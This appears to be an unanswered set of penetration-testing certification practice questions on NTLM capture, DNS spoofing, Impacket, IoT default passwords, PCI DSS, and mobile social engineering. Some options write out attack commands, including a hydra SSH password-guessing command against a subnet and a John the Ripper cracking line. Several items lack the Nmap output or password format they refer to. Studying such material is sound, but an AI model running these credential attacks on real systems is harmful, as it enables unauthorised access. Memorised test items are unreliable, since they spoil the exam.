A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server? 

A. Perform vertical privilege escalation. 
B. Replay the captured traffic to the server to recreate the session. 
C. Use John the Ripper to crack the password. 
D. Utilize a pass-the-hash attack. 

Question # 66

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective? 

A. Gain access to the target host and implant malware specially crafted for this purpose. 
B. Exploit the local DNS server and add/update the zone records with a spoofed A record. 
C. Use the Scapy utility to overwrite name resolution fields in the DNS query response. 
D. Proxy HTTP connections from the target host to that of the spoofed host. 

Question # 67

The results of an Nmap scan are as follows: Which of the following would be the BEST conclusion about this device?

A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory. 
B. This device is most likely a gateway with in-band management services. 
C. This device is most likely a proxy server forwarding requests over TCP/443. 
D. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation. 

Question # 68

Which of the following tools provides Python classes for interacting with network protocols? 

A. Responder 
B. Impacket 
C. Empire 
D. PowerSploit 

Question # 69

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform? 

A. A vulnerability scan 
B. A WHOIS lookup 
C. A packet capture 
D. An Nmap scan 

Question # 70

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? 

A. Unsupported operating systems 
B. Susceptibility to DDoS attacks 
C. Inability to network 
D. The existence of default passwords 

Question # 71

PCI DSS requires which of the following as part of the penetration-testing process? 

A. The penetration tester must have cybersecurity certifications. 
B. The network must be segmented. 
C. Only externally facing systems should be tested. 
D. The assessment must be performed during non-working hours. 

Question # 72

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information? 

A. Create a custom password dictionary as preparation for password spray testing. 
B. Recommend using a password manager/vault instead of text files to store passwords securely. 
C. Recommend configuring password complexity rules in all the systems and applications. 
D. Document the unprotected file repository as a finding in the penetration-testing report. 

Question # 73

Appending string values onto another string is called: 

A. compilation 
B. connection 
C. concatenation 
D. conjunction

Question # 74

A Chief Information Security Officer wants to evaluate the security of the company's ecommerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms? 

A. SQLmap 
B. DirBuster 
C. w3af 
D. OWASP ZAP 

Question # 75

A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory: U3VQZXIkM2NyZXQhCg== Which of the following commands should the tester use NEXT to decode the contents of the file? 

A. echo U3VQZXIkM2NyZXQhCg== | base64 -d 
B. tar zxvf password.txt 
C. hydra -l svsacct -p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24 
D. john --wordlist /usr/share/seclists/rockyou.txt password.txt 

Question # 76

A penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this binary? 

A. Peach 
B. WinDbg 
C. GDB 
D. OllyDbg 

Question # 77

A penetration tester receives the following results from an Nmap scan: Which of the following OSs is the target MOST likely running?

A. CentOS 
B. Arch Linux 
C. Windows Server 
D. Ubuntu 

Question # 78

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.) 

A. Spawned shells 
B. Created user accounts 
C. Server logs 
D. Administrator accounts 
E. Reboot system 
F. ARP cache 

Question # 79

A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives? 

A. Send an SMS with a spoofed service number including a link to download a malicious application. 
B. Exploit a vulnerability in the MDM and create a new account and device profile. 
C. Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading. 
D. Infest a website that is often used by employees with malware targeted toward x86 architectures.